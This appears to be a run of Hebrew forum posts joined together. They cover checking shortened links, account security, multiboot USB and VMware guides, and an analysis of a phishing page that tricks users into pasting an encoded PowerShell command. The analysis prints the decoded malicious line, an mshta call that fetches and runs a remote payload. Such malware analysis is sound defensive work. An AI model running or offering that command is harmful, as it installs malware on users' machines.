מאחורי קישורים מקוצרים הפכו נפוצים לשימוש בזכות יכולתם להפוך קישור ארוך ומסורבל לקישור קצר ונוח. הקישור המקוצר פשוט יותר לשיתוף מאשר קישור ארוך שלעיתים יכול להכיל גם מאות תווים, והוא מאפשר מעקב אחר נתונים שונים כגון מספר הלחיצות על הקישור.
לצד היתרונות שיש לקישורים המקוצרים, גם מספר חסרונות. לעיתים, גורמים עוינים עושים שימוש בקישורים מקוצרים על מנת להסתיר את הקישור האמיתי המסתתר מאחור. הקישור האמיתי, מכיל לעתים קוד זדוני, שעצם הלחיצה עליו תוביל להוריד תוכן זדוני למכשיר. כמו כן, הקישור עלול להוביל לעמוד דיוג בו בקשה להזין פרטים אישיים.
כיצד ניתן להזהר?
כך תוכלו לגלות מהו הקישור המסתתר מאחורי הקישור המקוצר:
Bit.ly - העתיקו את הקישור - שימו לב שאתם מעתיקים ולא מקליקים על הקישור.
הדביקו את הקישור בשורת ה-URL ובסוף הכתובת הזינו את התו "+" לדוגמה: https://bit.ly/3kTf2YL+, לחיצה על Enter תוביל אתכם לאתר bit.ly שיציג בפניכם את הקישור המקורי.
Cut.ly - העתיקו את הקישור - שימו לב שאתם מעתיקים ולא מקליקים על הקישור.
הדביקו את הקישור בשורת ה-URL ובסוף הכתובת הזינו את הסימן "@" לדוגמה: https://cutt.ly/vTLisiH@ לחיצה על Enter תוביל אתכם לאתר Cut.ly שיציג בפניכם את הקישור המקורי.
tinyurl.com - העתיקו את הקישור - שימו לב שאתם מעתיקים ולא מקליקים על הקישור.
הדביקו את הקישור בשורת ה-URL והוסיפו את המילה "Preview" לפני הקישור המקוצר לדוגמה: https://preview.tinyurl.com/y62ova26 לחיצה על Enter תוביל אתכם לאתר Tinyurl שיציג בפניכם את הקישור המקורי.
Tiny.cc - העתיקו את הקישור - שימו לב שאתם מעתיקים ולא מקליקים על הקישור.
הדביקו את הקישור בשורת ה-URL ובסוף הכתובת הוסיפו את הסימן "=" לדוגמה: http://tiny.cc/2lvluz= לחיצה על Enter תוביל אתכם לאתר Tiny שיציג בפניכם את הקישור המקורי.
קיימים שירותים נוספים המאפשרים לבדוק קישורים רגילים ומקוצרים, תוכלו לאתר אותם ברשת באופן חופשי על ידי חיפוש "unshorten url".
זכרו, קישורים מקוצרים אינם בהכרח זדוניים. פעמים רבות הם משמשים עבור מעקב אחר נתונים או מתוך רצון לייצר קישור קצר ונוח לשימוש. אם אינכם בטוחים, תוכלו להעזר במדריך זה על מנת לבחון את הקישור, או היכנסו באופן יזום לאתר אליו תרצו להגיע ולא על ידי לחיצה על הקישור.
דברים נלווים
ה
המדריך הזה יכול להימשך עוד ועוד ואין לדבר סוף, אבל חשבתי להוסיף עוד כמה דברים קטנים לתת על זה את הדעת ולהימנע ככל האפשר מפישינג.
תוכנה של שליטה מרחוק
אני מאמין שיש הרבה כאלה שמשתמשים בשירות הזה של חיבור מרחוק אבל הסכנות בחיבור הזה לא פשוטות.
לפני כמה שנים ישבתי בנתב"ג והתחברתי למחשב מרחוק לכמה דקות, למחרת חשכו עיניי לראות שחשבון גוגל שלי מושהה, אחרי ניסיון להתחבר מחדש הוא כותב לי שהסיסמה שגויה. הבנתי מהר שמישהו כבר נכנס לחשבון ועשה שם כמה שינויים ואחרי כמה דקות של איפוס המנוי הצלחתי להיכנס מחדש.
מאז הסיפור הזה אני דיי אובססיבי לפרטיות ואין לי שום סיסמה קריטית של משהו חשוב שהיא שמורה בגוגל או בכל כלי אחר.
אפשר לעשות סיסמה קשה מאוד מאוד ולשמור אותה בראש לכל מיני אתרים שחשוב לך הפרטיות, למרות שכלום ממליצים לא לעשות סיסמה אחת לכל האתרים שלך אבל במקרה שזה סיסמה קשה מאוד זה עדיף לשמור בראש מאשר להיות נתון לחסדיו של שומר הסיסמאות כרום וכדומה.
הכי חשוב בתוכנות שליטה מרחוק ולא משנה איזה, לא לתת גישה קלה לחשבון:
בנוסך לעשות בהגדרות>אבטחה חוזק סיסמה 10 ספרות
ואם אתה מאוד רוצה לשמור על החשבון ונדרש לך רק חיבור אחד אז תסמן את הריבוע של הפעל
והכי חשוב לעשות אימות למכשיר הסלולרי שלך:
זה כלל ברזל בכל חשבון שאתה רוצה לשמור עליו זה לעשות אימות טלפוני או סיסמה למכשיר נייד שלך
תוכנה במחשב
יש לך תוכנה שקיבלת מחבר או לא משנה מאיפה ואתה לא יודע מה היא מכילה, בדרך כלל הבדיקה בזה לא פשוטה כי כמעט ואין אפשרות להיות חשופים לכל התהליכים שקובץ EXE מריץ במחשב לפני ההפעלה. זה נכון שיש תוכנות שמצליחות לפתוח קבצים כאלה אבל לא ברמה של להבין בדיוק מה כל קובץ וקובץ עושה.
הכי פשוט זה לעשות הקלטה של תעבורת רשת ולהתקין את התוכנה בארגז חול או מכונה וירטואלית וכדומה, ואז יש לך הרבה יותר הבנה על התהליכים שעשתה התוכנה במחשב ואיזה שינויים היא גרמה לך.
ישנם קבצי סקריפט שיכולים לעשות הרבה הרס וחורבן במחשב ולכן צריך להיזהר מאוד מה מכיל תוכן הקובץ.
בשונה מקובץ EXE קבצי סקריפט אתה יכול להקליק על הקובץ קליק ימיני ואז ללחוץ על "ערוך"
למשל, לפני כמה ימים יוסי מחשבים היקר הביא קובץ סקריפט לאחד מהמשתמשים להפעיל כדי לקבל מידע מערכת, נניח ואני לא מכיר אותו ולא סומך עליו ואני מפחד ללחוץ על הקובץ (כמובן שמדובר במשתמש מיוחד ובקיא מאוד במחשבים וראוי לסמוך עליו לכתחילה) מה אני עושה?
ואז אני מקבל את הטקס הבא:
@echo off
(
systeminfo | find "System Model"
echo.
echo processor info
wmic cpu get name
wmic cpu get caption
echo.
echo system installed
echo.
reg query "hklm\system\controlset001\control\nls\language" /v Installlanguage | find "040d" >nul && echo heb || reg query "hklm\system\controlset001\control\nls\language" /v Installlanguage | find "0409" >nul && echo eng
ver
wmic os get osarchitecture
echo.
systeminfo | findstr /C:"Total Physical Memory"
echo.
echo motherboard
echo.
wmic baseboard get product,Manufacturer,version,serialnumber
) >info.txt 2>&1
אם אני מבין במחשבים ויש לי ידע קצת בפקודות אז אני מבין מיד שהכל תקין
ואם אני לא מבין כל כך, אפשר לקחת שורה מהטקס ולהעתיק אותה בחיפוש גוגל כמו:
אפשר לקרוא את התוצאות ולהבין מיד שמדובר בפקודה תקינה לחלוטין וכן הלאה על כל המסמך.
אם בכל זאת יש לך משהו אתה לא הצלחת למצוא ברשת או אין לך מספיק מידע על זה תמיד תוכל לפתוח אשכול בפורום בעזרה הדדית ונשמח כל החברים שמבינין לעזור לך.
המדריך נועד לתת הבהרה וידע לכל הקוסמוס הענק הזה של אבטחת מידע ברשת וקצת כלים להימנע ככל האפשר מכל דיוג כזה או אחר באינטרנט.
אבל לפני הכל ואחרי הכל זה תפילה קטנה בכל יום לרבש"ע שלא ניפול לאתר זדוני ולהינצל מכל מיני גזירות קשות ואכזריות והשם הטוב יכפר בעדינו ויה"ר שלא נדע צער ושם נזק לא בגוף ולא בממון לנו ולכל עם ישראל בכלל בכל מקום שהם.
ובהזדמנות זו אני מאחל לכל החברים היקרים כתיבה וחתימה טובה ושנה טובה ומתוקה אמן.
אין צורך להכביר במילים על התוכנה המפורסמת IGO, פיתוח ישראלי מוצלח מאוד ומוכר בכל העולם, למרות שאני יודע שהרבה משתמשים בתוכנת הניווט WAZE, אבל אם מדברים על נוחות וממשק, אין ספק ש - IGO עושה עבודה יפה מאוד.
אני מביא לפניכם את תוכנת הניווט האחרונה (Mar 21 2019) שיצאה לרשת כולל המפות החדשות שהתפרסמו לפני כמה ימים.
התקנתי את התוכנה על המערכת שלי ברכב (גירסא 8.2) ועובד לי מצוין.
מחלצים את הקובץ לתוך הזיכרון המובנה או לכרטיס (תלוי מה נח לכם) , נכנסים לתיקיית Install ומתקינים את APK.
אם יש שגיאה בהתקנה או בהפעלת התוכנה, יש להעתיק את התיקייה iGO_Luna לתיקיית שורש של מנהל הקבצים ומשם להפעיל את ההתקנה.
לאחרונה ראיתי את הצורך להביא מדריך על התוכנה הזאת, למרות שכבר קיים בפורום אשכול דומה לתוכנה של VENTOY, אך עדיין אני חושב שיש תועלת מרובה בתוכנה הנוכחית עקב כמה יתרונות שנרחיב עליהם כאן.
אני זוכר את עצמי בפעם הראשונה כשראיתי את התוכנה של YUMI, כ"כ התלהבתי מהרעיון שאפשר להכניס מלא דיסקים של בוטים בהתקן נשלף אחד, זה התחיל כשהיה לי אונקי של 16 GB והכנסתי בפנים מערכת הפעלה כמובן, ועוד דיסק טכנאים אחד או שניים, ובתיקייה נפרדת העמסתי כמה תוכנות של עזרה ראשונה, והייתי מאחסן את האונקי בחליפה ובמידת הצורך הייתי שולף ומתקן בעיות מגוונת דרך הכלים האלה.
עם הזמן, הצורך להוסיף עוד כלים גבר, ואז הייתי זקוק לאונקי בנפח יותר גדול, היום אני עומד עם 2 התקנים נשלפים שכל אחד 256 GB, ועדיין הכונן שלי צועק הצילו בצבע אדום על מקום שצריך לפנות.
לפני שלוקחים התקן נשלף ומכניסים את כל הבוטים, שימו לב שצריך לבחור משהו טוב ומהיר כדי לעשות את כל הפעולות בצורה הכי טובה.
אפשר להכיר אותי מהפוסטים בפורום שאני אוהב להשקיע, ולכן הבחירה שלי לאונקי הייתה 2 דגמים שלדעתי הכי טובים ומומלצים בנושא הזה כי שם המשחק פה זה הביצועים והמהירות (אפילו שיכול להיות שהם פחות טובים מבחינת מהימנות אבל זה לא מעניין אותי כרגע כי החומר כבר קיים בדיסק קשיח חיצוני וזה רק לניידות)
הדגמים שבחרתי בשבילי הם: SanDisk Extreme Pro USB 3.1 Corsair Flash Voyager GTX USB 3.1
כמובן אני מדגיש, מי שאין לו תקציב יכול לקחת דגם כזה עם נפח זיכרון יותר נמוך או דגם אחר שנמכר יותר זול אבל הכי חשוב שהוא יהיה עדיין מהיר ביחס לזיכרונות הפשוטים והאיטיים.
אחרי שמפעילים אותה מקבלים את החלון הבא ולוחצים כמו בתמונה:
כעת נסביר מה כל לחצן עושה:
כאן תבחר את ההתקן נשלף שאתה מעוניין לשפוך עליו את הקובץ בוט, לצורך העניין בחרתי את הכונן שלי שנמצא באות כונן E:
כאן ישנה אפשרות לאתחל את ההתקן למערכת קבצים NTFS או FAT32, בסימון משבצת זו כל החומר שנמצא בפנים ימחק.
שימו לב אין צורך לסמן משבצת זו, התוכנה יכולה לעשות התקן רב-אתחול גם אם יש חומר קיים בהתקן.
כאן תבחרו איזה דיסק בוט אתם מעוניינים לשפוך על ההתקן, אפשר לראות שבחרתי את kali.
כאן ישנה אפשרות לסמן את המשבצת למקרה שאין לי את הדיסק בוט הנוכחי והתוכנה מורידה את הדיסק מאתר הבית שלה, במקרה ולוחצים על המשבצת מקבלים את ההודעה הבאה:
תרגום ההודעה:
"האם להפעיל את ההורדה של הדיסק בוט?
תחכה להורדה שתסתיים לפני שעוברים לשלב 2"
ואם לוחצים על "כן", התוכנה מפנה אותנו לעמוד ההורדה של התוכנה, במקרה שלי זה העמוד: https://www.kali.org/downloads/
ואז מורידים את הבוט ומכניסים אותו לתוכנה איפה שנמצא מס' 5
כאן מנווטים לדיסק בוט שנמצא במחשב שאנו בחרנו במס' 3.
בסימון משבצת זו, אפשר לראות את כל ה - ISO שנמצאים במחשב ולאו דווקא את ה - ISO הנצרך לבחירה שלי.
לדוגמא:
התוכנה מחפשת ISO של kali, ואם אני מסמן את המשבצת אז בסייר קבצים יופיעו כל ה - ISO שיש לי כמו זה:
כאן ישנה אפשרות להתקן נשלף שכבר מכיל כמה בוטים דרך התוכנה הנ"ל למחוק מההתקן בוטים שהוא רוצה כדי להסיר את זה מהרשימה:
אפשר לראות את הרשימה של הבוטים שההתקן שלי מכיל, ואז אני בחור מה להסיר ולוחץ על "Remove".
כעת אחרי שבחרנו את ההתקן נשלף ואת כל ההגדרות מסביב, אנו עוברים לשלב הבא ולוחצים על "Create".
ואז מקבלים את ההודעה הבאה:
תרגום ההודעה:
התוכנה יוצרת syslinux mbr על ההתקן (לא לפחד, זה עובד מושלם עם ווינדוס)
התוכנה כותבת שם חדש להתקן (MULTIBOOT) כל שם אחר ימחק.
מתקין את הדיסק בוט שבחרת על ההתקן.
האם אתה לחלוטין בטוח שההתקן שלך זה אות כונן E:
תבדוק פעמיים כדי שתהייה בטוח בפעולה שאתה עושה.
לחץ על "כן" אם אתה בטוח, אחרת תלחץ על "לא".
ואז לוחצים על "כן" ומקבלים את החלון הבא:
אחרי הפעולה מקבלים את החלון הבא ולוחצים על "Next":
ואז מקבלים את החלון הבא:
תרגום ההודעה:
"האם אתה מעוניין להוסיף עוד ISO להתקן שלך?"
אם אתה מעוניין אז תלחץ על "כן" ואז התוכנה חוזרת לחלון הראשי ואפשר להוסיף עוד דיסקים שתחפצו מהרשימה, ואם אתה לא מעוניין אז תלחץ על "לא" ועל "Finish"
הדרכה על מה ללחוץ ברשימה
ג
אני נותן דוגמא להתקן נשלף פופולארי שמכיל כמה בוטים חשובים, וכל אחד יקח את זה למקום שהוא רוצה.
לדוגמא:
אני רוצה התקן נשלף שיש בתוכו:
ווינדוס 10
דיסק טכנאים של Sergei Strelec's
דיסק טכנאים של Hiren’s BootCD
דיסק הצלה של ESET
דיסק של Boot-Repair-Disk
דיסק של איפוס סיסמא
ואז אחרי כל הפעולות האלה אנו מקבלים אונקי שיש בתוכו מס' רב של בוטים באתחול אחד.
שימו לב, שינם הרבה קבצי ISO שאינם מופיעים ברשימה, במקרה כזה צריך לעשות לפי ההגדרה הבאה:
שימו לב כמה בוטים צרבתי להתקן דרך ההגדרה הזאת וכולם עובדים חלק:
בדיקת התקן נשלף תקין אחרי אתחול
ד
אחרי ששפכנו את הדיסקים להתקן נשלף, רצוי לבדוק את ההתקן אם הוא אכן עובד באתחול.
לשם כך ישנם תוכנות המדמות אתחול ללא צורך לאתחל את המחשב בפועל.
התוכנה המפורסמת שאני משתמש איתה כבר שנים נקראת Qsib של sordum, אפשר להוריד אותה כאן: qsiboot v1.3
מקור - אתר הבית של התוכנה
אחרי שהורדנו והפעלנו את התוכנה, נעשה כמו בתמונה:
ואז נקבל את החלון הזה, אפשר לראות שההתקן תקין לחלוטין והוא מגיב מצוין לאתחול:
בתמונה רואים את הנושאים של הדיסקים, כך שאם נבחר בראשון, נקבל את החלון הבא:
ואז בוחרים את הדיסק שאתה מעוניין.
בדיקה יסודית יותר להתקן נשלף
ה
שימו לב, הבדיקה לעיל מספיקה בשביל לראות שהאתחול של ההתקן תקין, אבל עדיין אי אפשר לראות שההתקן מריץ את הדיסק בצורה תקינה.
לדוגמא:
אם אני בחור בדיסק טכנאים של DLC Boot 2017 ואני רוצה לבחור ב - Mini Windows 10
אז אני מקבל את השגיאה הבאה:
אך עדיין זה לא אומר שההתקן לא תקין, כי זה אומר שגיאה משום שאי אפשר לתוכנה להיכנס לאפשרות הזאת כי אנו נמצאים כבר במערכת הפעלה דולקת.
לכן הפתרון זה להתקין על המחשב מכונה וירטואלית ואז להריץ את ההתקן במכונה ולראות אם ההתקן מצליח להריץ את הדיסק בוט מתחילתו עד סופו.
ראשית כל נוריד מכונה ויטואלית, אפשר למצוא את התוכנה ברחבי הפורום והרשת או להיכנס לכאן.
ואז אפשר לראות שההתקן מצליח להריץ את Mini Windows 10:
רשימת יתרונות:
ו
אין צורך לרוקן את ההתקן נשלף מהחומר הקיים, אפשר לצרוב עליו כל ISO ולהפוך אותו בר אתחול בלי פרמוט כלל.
פשוט לא מסמנים את המשבצות כמו בתמונה ואז התוכנה שופכת את הבוט על ההתקן בלי לאבד את החומר הקיים שם.
במקביל, אחרי הצריבה אפשר להוסיף על ההתקן תיקיות וקבצים אישיים וכד' וזה בכלל לא פוגע באתחול של ההתקן, רק צריך לוודא לא לגעת בתיקיות של האתחול.
אני למשל מחזיק באונקי שיש לו מולטי בוט של YUMI ויש לי שם חומר נוסף של תוכנות שאני מאחסן אותו בתיקייה אחרת וזה לא פוגע בתהליך של האתחול אונקי.
מה שבאדום זה החומר הנוסף שהכנסתי.
אפשרי גם ווינדוס טו גו:
אפשרי להוסיף מחיצות בלינוקס בשביל שימור הנתונים.
התוכנה מתעדכנת תמיד ללא הפסקה
יש אפשרות בתוכנה להוריד את הדיסק בוט מאתר הבית כדי לא לבזבז זמן מיותר כפי שהסברתי בתחילת המדריך במס' 4
כמעט אפס תקלות בשונה משאר התוכנות שעושים הרבה בעיות עם האתחול וכדו'
שאלות ותשובות:
ז
א. האם זה צורב כ MBR או UUFY?
כנס לאתר הבית של התוכנה ותראה שיש תוכנה לביוס בלבד ויש תוכנה לביוס + UEFI, והתוכנה שעשיתי את המדריך היא לביוס בלבד, אבל לא נתקלתי עם בעיות איתה, תוכל לנסות אותה במחשב שלך, אם אתה רואה בעיות אפשר במקביל להוריד את התוכנה השנייה ולהיעזר במדריך לצרוב את מה שצריך.
ב. האם אפשר גם אחרי שסיימתי את הכל ובחרתי לא להוסיף עוד ISO האם אוכל לאחר מכן להוסיף עוד?
אם אתה שואל את השאלה הזאת אז כנראה המדריך שלי לא היה מספיק ברור...
אחרי שמסיימים לצרוב בוט אחד ולוחצים בסיום הצריבה על "כן" (כמו שהסברתי במדריך) התוכנה חוזרת למסך הראשי ואתה יכול להוסיף כמה בוטים שתרצה, בתנאי שאתה לא חוזר על אותו הדיסק, למשל, ברגע שבחרת ווינדוס 10 ברשימה, א"א לבחור באותה רשימה אחרי זה ווינדוס 8 או 7 (אלא אם כן בחרת ברשימה כמו זה אבל אני לא רוצה להיכנס לזה כרגע)
היי חברים.
יצא לי בימים האחרונים לראות קישור של אתר פישינג מתוחכם וחשבתי לשתף אתכם בשלבים של הוירוס איך הוא נכנס כל כך פשוט וגם ללמוד איך הדברים נעשים כדי להחכים לפעם הבאה.
האתר מבקש ממנו לאמת שאנחנו לא רובוט אז הוא מבקש שנעשה את מה שהוא מבקש כדי להוכיח את זה.
מי שיודע אנגלית אז מבין שהוא מבקש ממך להפעיל את השורת הפקודה ואז לעשות הדבק של מה שיש לך ב- Clipboard ואז להפעיל.
אז כמובן שזה מאוד סקרן אותי ועשיתי לפי ההוראות שלו וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)
אז מה יש לנו כאן?
מדובר בפקודה של PowerShell מוצפנת שאמורה להפעיל משהו בצורה שלא אפשרית לראות מה אתה באמת מפעיל, הצפנה זו נועדה להסתיר את הפקודה המקורית, מה שהופך את הבנת מטרתה למסובכת יותר, וזה גם הסיבה שזה עלול להיות מאוד מוסכן שהרי אי אפשר לדעת מה היא מכילה.
עכשיו נעבור לניתוח:
powershell.exe: זהו הקובץ הניתן להפעלה של PowerShell, שהוא מעין שורת פקודה מתקדמת של Windows.
-eC: זהו פקודה המורה ל-PowerShell לפעול במצב של ביצוע קוד מוצפן.
ואז יש את המחרוזת הארוכה המכילה את הקוד המוצפן עצמו, במקרה שלנו זה המחרוזת:
אפשר לראות שהוא הצליח לפענח את המחרוזת וקבילתי את הקישור הבא: (זהירות התוכן מכיל קובץ זדוני)
mshta "https://clicktogo.click/downloads/tra10"
עכשיו תשאלו אותי מה הבעיה להוריד תוכנה ברשת? הרי אני לא מפעיל אותה במחשב אז מה הבעיה?
שאלה מצוינת ובדיוק בגלל זה יוצר הקוד הזדוני חשב על זה והכניס את הפקודה mshta לפני הקישור
מה זה אומר?
mshta היא קיצור של "Microsoft HTML Application Host". זהו כלי שמשמש להפעלת קבצי HTML כאילו היו יישומים עצמאיים. הוא מאפשר להטמיע בתוך קבצי HTML שפות תסריט כמו VBScript ו-JScript, מה שהופך אותו לכלי רב-עוצמה לפיתוח יישומים פשוטים.
אז אם אני מפעיל את הפקודה למעלה במחשב פירושה שהמחשב ינסה לפתוח את כתובת האינטרנט הזו באמצעות mshta. כתוצאה מכך, הדפדפן ינסה להוריד את הקובץ הנמצא בכתובת הזו ולהפעיל אותו כאילו היה יישום HTML.
מה יכול לקרות כשמפעילים פקודה כזו?
הפעלת יישום: אם הקובץ בכתובת הוא קובץ HTML תקין עם קוד VBScript או JScript, הוא יופעל ויבצע את הפעולות שכתובות בקוד.
הורדת תוכנה: הקובץ יכול להוריד ולהתקין תוכנות נוספות למחשב.
הפעלת תוכנה זדונית: אם הקובץ מכיל קוד זדוני, הוא יכול לפגוע במחשב שלך, לגנוב מידע או להתקין תוכנות ריגול.
בקיצור ממש ממש לא מומלץ לנסות את זה ושומר נפשו ירחק מהם.
לסיכום:
אי אפשר לדעת איך אתה יכול לקבל וירוס אבל שים לב מה אתה מפעיל ברשת ואיזה פקודה אתה עושה לפני שיהיה מאוחר מדי.
ישנם כמה דרכים ברשת להתקין מערכת הפעלה של אפל על מכונה וירטואלית אבל במדריך שלנו אין צורך כמעט בשום פעולה, רק להטעין את הקובץ במכונה וזהו, המערכת עולה לנו עם כל ההגדרות ורק נשאר להפוך אותה לעברית בכמה קליקים כפי שיוסבר בהמשך.
המדריך שלנו זה להתחיל תוך כמה דקות לעבוד על מערכת הפעלה של Ventura , מי שרוצה לחוות את תהליך ההתקנה וכל השלבים, בסוף השכול אני אצרף תמונה של מערכת הפעלה Ventura שאיתה אתם מתקינים במכונה עם כל השלבים מהתחלה.
שנתחיל?!....
המדריך שלנו יעסוק עם מכונה וירטואלית של VMware.
שימו לב שלב ראשון, לפני השימוש בתוכנה יש לוודא שהווירטואליזציה זמינה, אחרת התוכנה לא תעבוד.
אפשר לבדוק אם זה פעיל במנהל משימות שלכם כמו שרואים אצלי בלשונית ביצועים:
גילוי נאות: אני אמרתי כמה וכמה פעמים שיש לי מערכת הפעלה 10 ופתאום רואים מנהל משימות של 11, אז באמת לפני כמה ימים קיבלתי את הכונן SSD NVMe הכי טוב לדעתי שקיים: Samsung 990 PRO NVMe M.2 2280 2TB SSD
אז אם כבר מפרקים מחשב נייד נכניס לו בפנים גם מערכת הפעלה חדשה ואני בינתיים מרוצה.
אם אתם לא יודעים איך להפעיל את זה אפשר לכתוב בגוגל כך ולקבל מלא מדריכים:
How to Enable Virtualization
שמתי לה שיש כאלה שאוהבים קצר וקולע ולא ארוך מדיי אז אני כותב כאן את תמצית הדברים ואז אני אפרט כל שלב.
התקן את VMware Player (רצוי עם מנהל התקן מקלדת מורחב, אתה יכול לבחור במהלך ההתקנה). אתה יכול לבחור את הגרסה החינמית.
הפעל כמנהל מערכת win-install.cmd (מ-Unlocker, כלול בתיקייה)
חלץ את הארכיון עם macOS 13.7z
הסר את התכונה קריאה בלבד מכל הקבצים (אם היא מוגדרת)
הפעל את VMware Player
בחר Open virtual machine ובחר macOS 13.vmx
במידת הצורך, ניתן להתקין עוד מעבדים (ברירת המחדל היא 4, אבל לא מספיק לי) ו-RAM.
לחץ על Play ואז VMware ישאל על ההגדרות - לחץ על I copy it
אם הוא מאט מאוד - נסה להשתמש ב-Hyper-V Switch.exe כשהמכונה הווירטואלית כבויה.
עכשיו אחרי שהורדנו את הכל אנו מחלצים את את כל החלקים וכך זה נראה:
VMWare היא חברת ענק, אבל יש להם תוכנת וירטואליזציה בשם VMWare workstation pro. זוהי תוכנת וירטואליזציה רבת עוצמה שבה אתה יכול להשתמש כדי להתקין כל מערכת הפעלה אורחת. Windows, Linux, Chrome OS, ובוודאי MacOS הם אחד מהם. אבל בדיוק כמו מערכות ההפעלה האחרות, אינך יכול להתקין ישירות את ה-MacOS ב-VMWare. דוגמה טובה היא שמערכת ההפעלה האורחת של Apple לא מותקנת כברירת מחדל ב-VMWare, בשביל זה יש להוריד את ה-unlocker מ-GitHub ולהתקין אותו ואז תקבלו את האפשרות.
בשביל זה נחלץ את הקובץ Unlocker 3.0.4 שנמצא בתיקיית tools ונפעיל את win-install כמנהל:
כעת שוב נחלץ את הקובץ הזה macOS 13.7z ונקבל את התמונה הבאה:
כעת ניגש למכונה וירטואלית ונעשה כך:
אפשר לראות בתמונה הבאה שהמכונה כבר הוגדרה אוטומטי לכל מיני הגדרות שהמערכת זקוקה להם:
עכשיו נפעיל את המכונה ונעשה כך:
כעת נהפוך את המערכת לעברית כך:
אם אתם רואים שזה איטי לכם אפשר להשתמש בכלי הבא כדי לשפר את זה:
להפעיל את הקובץ Hyper-V Switch שנמצא בתיקייה tools כשהמכונה הווירטואלית כבויה.
עד כאן המדריך לתמונה מוכנה של מערכת העלה אפל למכונה, מי שרוצה לראות את ההתקנה של המערכת הפעלה ולחוש את כל השלבים אני מצרף כאן את הקובץ שאיתו אתם מתקינים את המערכת הפעלה במכונה.
אני רואה שיש לא מעט ביקוש לכל הנושא הזה של ניווט, מפות והמסתעף, הרבה אשכולות ופוסטים נכתבו על זה.
חשבתי אולי לרכז את הכל בקטגוריה אחת מסודרת, אשר תכלול תת קטגוריות כמו תוכנות של ניווט , מפות לעל מיני ערים וארצות, ועוד המון המון דברים.
אני מכיר פורומים שלמים רק על הנושא הזה של ניווט, אז חשבתי לפחות שיהיה על זה קטגוריה אחת מסודרת להכל.
יש באמתחתי מלא מלא חומר לתוכנות ניווט כמו קבצי שפה, וכן הרבה ערכות נושא.
וכן אימולטורים להריץ תוכנות ניווט של WINCE ועוד...
זה אפשרי לחלק את זה ככה:
תוכנות ניווט - IGO 8 , IGO PRIMO , TOM TOM ועוד..
מפות - כל הערים והארצות.
בקשת מפות - כל אחד שנוסע לחו"ל יכול לתייג אותי או מישהו אחר שמבין בזה ולקבל את המפות למקום היעד שלו.
קבצי ערכות נושא - מלא סקינים לכל מיני תוכנות של ניווט שיכולים להוסיף מלא פונקציות.
קבצי מצלמות מהירות - לכל המקומות בעולם כולל הארץ הקדושה שלנו.
מדריכים - כל מיני מדריכים להכניס משחקים או להחליף תמונות רקע של מסך הפתיחה וכדומה.
לפני המון שנים פגשתי בפורום FXP את דני מילר, אדם מוכשר מאוד בקנה מידה לא רגיל, ואז ראיתי באחד מהאשכולות שלו שהוא הביא קובץ התקנה של מערכת הפעלה הכוללת בתוכה ווינדוס 7,8 עם כל הגירסאות וארכיטקטורות, זה היה בשבילי הלם, כי תמיד חשבתי שצריך ללכת עם כמה התקנים נשלפים כדי להתקין כל מיני מערכות הפעלה, ועכשיו בקובץ אחד יש לך את הכל.
דוגמא:
:::
:::
עם השנים הבנתי שהוא לא הראשון שחשב על זה, הקדימו אותו הרוסים הגאונים ואחריהם הרשת מוצפת בדיסקים כאלה מכל מיני סוגים.
תתפלאו אבל יש כאלה שהגדילו לעשות ויצרו קובץ עם כל סוגי מערכות הפעלה בכל מיני שפות התקנה וזה מגיע לגודל של עשרות ג'יגה.
רציתי מאוד ללמוד את הנושא הזה, מדובר בזמן לא מבוטל על המחקר שעשיתי ואני מגיש לפניכם את התוצאות, אני מקווה שאולי זה יכול לסייע לאחד מכם בצורה כזאת או אחרת.
כעת ניגש לקובץ ISO של ווינדוס 10 החדש (Win10_21H1) ונחלץ את הקובץ למחשב:
כעת נפתח את התוכנה NTLite (שהבאנו למעלה) ואז ננווט לקובץ "install.wim" שנמצא בתיקיית "sources" ונגרור אותו לתוכנה:
כעת אתם יכולים לראות את כל הגירסאות וארכיטקטורות שההתקנה מכילה:
אני אישית לא מעוניין בכל הגירסאות ולכן אני פשוט מקליק קליק ימיני על הגירסא שאני לא מעוניין ולוחץ על "Delete" :
אחרי שבחרתי מה להשאיר אני עושה את הפעולות הבאות:
שומרים בשם "install"
מחכים מעט זמן...
ואז מקבלים את ההודעה הבאה: (זה אומר שהצלחנו לייצא את הקובץ ל - WIM)
כעת ניגש למערכת הפעלה שאני רוצים לחבר.
לצורך דוגמא, אני רוצה לחבר את ההתקנה של ווינדוס 7 לווינדוס 10.
ניגשים לקובץ ISO של ווינדוס 7 ומחלצים אותו כמו שהסברנו למעלה.
וגוררים את הקובץ "install.wim" שנמצא בתיקיית "sources" לתוכנה כמו שהוסבר לעיל וזה מה שההתקנה מכילה:
אחרי שמחקתי את מה שאני לא מעוניין, אני מייצא את הכל בקובץ WIM:
כעת יש לי שתי קבצי WIM ששמרתי, אחד של ווינדוס 10 ואחד של ווינדוס 7:
כעת נפעיל את התוכנה WinToolkit שהורדנו למעלה ונלחץ כאן:
נפתח את הקובץ WIM של ווינדוס 10 דרך התוכנה:
עוברים ל - "WIM Manager" :
ואז לוחצים על "Merge Image" :
מנווטים לקובץ WIM של ווינדוס 7 ולוחצים על "Open" :
מחכים מעט זמן עד שהפעולה מסתיימת והחלון נראה כך:
ואז לוחצים על "rebuild" ומחכים מעט זמן:
כעת אני מנווט לקובץ WIM של ווינדוס 10 (על הקובץ הזה נשמר כל השינויים כי זה הקובץ הראשון שפתחנו ב - WIM Manager)
ויש לנו קובץ WIM שמכיל התקנה של ווינדוס 7 ו - 10 בממשק אחד, שימו לב למשקל:
את הקובץ WIM של ווינדוס 10 אני מכניס לתיקיית "sources" (במידה ויש כבר אחד קיים אז למחוק אותו או להחליף בחדש) שנמצא בתיקיית ווינדוס 10 כמו בתמונה:
כעת נפתח שוב את התוכנה NTLite ונגרור את הקובץ install.wim :
ונקבל את החלון הבא:
כעת נלחץ על Create ISO:
בחלון זה נבחר שם לקובץ, אני בחרתי "WIN 7 10 AIO" :
גם כאן תתבקשו לבחור שם, בחרתי את אותו שם כמו מקודם:
מחכים מעט זמן...
ואז מקבלים את ההודעה הבאה :
אחרי כל השלבים, נשאר לנו לבדוק אם באמת הקובץ תקין וראוי להתקנה.
אז הדרך הפשוטה לבדוק את הקובץ היא דרך מכונה וירטואלית .
אחרי שהגדרנו את המכונה, ננווט את המכונה להעלות את הקובץ התקנה שייצרנו:
אפשר לראות שהקובץ תקין לחלוטין ומצליח להתקין ווינדוס 7 בממשק התקנה של 10.
כמובן שזה רק הדגמה, זאת אומרת אפשר להכין כמה גירסאות שתחפצו ולשחק עם זה איך שבא לכם.
